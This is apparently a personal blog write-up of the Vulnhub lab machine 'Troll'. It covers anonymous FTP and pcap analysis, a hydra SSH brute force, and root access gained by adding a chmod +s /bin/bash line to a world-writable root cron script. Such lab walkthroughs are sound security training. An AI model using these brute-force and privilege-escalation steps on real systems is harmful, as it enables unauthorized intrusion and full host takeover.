Home Troll
Post
Cancel

Troll

Posted Feb 7, 2024
By KS
8 min read

Machine Information

Host discovery

  • target IP: 10.10.10.134

Information Gathering

Nmap Time

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

nmap -p- -T4 10.10.10.134 -A -oA 10.10.10.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-07 10:05 +08
Nmap scan report for 10.10.10.134
Host is up (0.0011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.10.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:E4:24:24 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.11 ms 10.10.10.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.60 seconds

Exploiting Port 21

Since there’s a FTP port opened, I decided to look into that first.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

ftp 10.10.10.134   
Connected to 10.10.10.134.
220 (vsFTPd 3.0.2)
Name (10.10.10.134:root): Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||39461|).
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
229 Entering Extended Passive Mode (|||56765|).
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
100% |***********************************************************************************************************************************************************************************************|  8068        2.25 MiB/s    00:00 ETA
226 Transfer complete.
8068 bytes received in 00:00 (1.58 MiB/s)

It seems like these only a file in FTP. I then get the file and anaylze it.

It seems like someone’s FTP was saved in the pcap file. Let me have a look into it and search for anything useful.

It seems like there’s this sup3rs3cr3tdirlol which might be useful. Aside frm that, there are nothing useful anymore. I then decided to move on into the next port.

Exploiting Port 80

Based on the information from pcap, I suspect that the sup3rs3cr3tdirlol might be a directory for the website. I then search and see for more information.

After checking around, this is the only thing that I get. I then look into the given file and see what it is.

1
2

file roflmao    
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped

It seems like it is a executable file. I then tried to execute the file and see what it is.

1
2

./roflmao 
Find address 0x0856BF to proceed

It is asking me to find address. I then tried to used the address as a directory and check.

It seems like I found another hidden directory. I then look into each one and search for useful information. At the end of each directory, there’s a file which looks like credentials. I then download both and run hydra to brute force with the given files.

1
2
3
4
5
6
7
8
9
10

hydra -L which_one_lol.txt -P Pass.txt ssh://10.10.10.134
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-07 10:38:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 20 login tries (l:10/p:2), ~2 tries per task
[DATA] attacking ssh://10.10.10.134:22/
[22][ssh] host: 10.10.10.134   login: overflow   password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-07 10:38:32

After including the password file name as one of the potential password, I managed to get a credential that I could login into ssh.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

ssh overflow@10.10.10.134 
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ED25519 key fingerprint is SHA256:jhpbgUldAKI9YAJOKhJZe9ypYt7GlEKUKU2WQ+zZBSs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ED25519) to the list of known hosts.
overflow@10.10.10.134's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Aug 13 01:14:09 2014 from 10.0.0.12
Could not chdir to home directory /home/overflow: No such file or directory
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)

Privilege Escalation

Now that I have shell, time for another round of information gathering for privilege escalation

1
2
3
4
5

overflow@troll:/$ ls -la /var/log/cronlog 
-rwxrwxrwx 1 root root 23 Aug 13  2014 /var/log/cronlog
overflow@troll:/$ cat /var/log/cronlog
*/2 * * * * cleaner.py

After looking for awhile, I found a cron log and it seems like it is executing a python script. I then use pspy to further confirm as well as looking for the cleaner.py.

1
2
3
4
5
6

2024/02/06 18:53:25 CMD: UID=0     PID=1      | /sbin/init
2024/02/06 18:54:01 CMD: UID=0     PID=18196  | /usr/bin/python /lib/log/cleaner.py 
2024/02/06 18:54:01 CMD: UID=0     PID=18195  | /bin/sh -c /usr/bin/python /lib/log/cleaner.py 
2024/02/06 18:54:01 CMD: UID=0     PID=18194  | CRON 
2024/02/06 18:54:01 CMD: UID=0     PID=18197  | sh -c rm -r /tmp/*  
2024/02/06 18:54:01 CMD: UID=0     PID=18198  | rm -r /tmp/pspy32s

By using pspy, I saw that the cronjob actually run a lot of stuff, which includes the cleaner.py. I then look into it and see it its readable or writable.

1
2
3
4
5
6
7
8
9
10

$ ls -la /lib/log/cleaner.py
-rwxrwxrwx 1 root root 96 Aug 13  2014 /lib/log/cleaner.py
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
except:
        sys.exit()

based on the result, it seems that I have access to read and write the cleaner.py and the cleaner.py will run the script as root. This means that I could use this to get root account.

1
2
3
4
5
6
7
8
9

overflow@troll:/lib/log$ cat cleaner.py 
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
        os.system('chmod +s /bin/bash')
except:
        sys.exit()

I then tried to add a line which set SUID bit for /bin/bash which I could just get root if this script is executing as root.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

$ ls -la /bin/bash
-rwsr-sr-x 1 root root 986672 Apr 23  2014 /bin/bash
$ /bin/bash -p
bash-4.3# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) egid=0(root) groups=0(root),1002(overflow)
bash-4.3# cd /root
bash-4.3# ls -la
total 28
drwx------  3 root root 4096 Aug 13  2014 .
drwxr-xr-x 21 root root 4096 Aug  9  2014 ..
-rw-------  1 root root    0 Aug 13  2014 .bash_history
-rw-r--r--  1 root root   58 Aug 10  2014 proof.txt
-rw-r--r--  1 root root   74 Aug 10  2014 .selected_editor
drwx------  2 root root 4096 Aug 10  2014 .ssh
-rw-------  1 root root 5538 Aug 13  2014 .viminfo
bash-4.3# cat proof.txt 
Good job, you did it! 


702a8c18d29c6f3ca0d99ef5712bfbdc

Things I leanred from the machine

  • CRONJOB is fun
Vulnhub
boot2root
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents

Zico2

Troll 2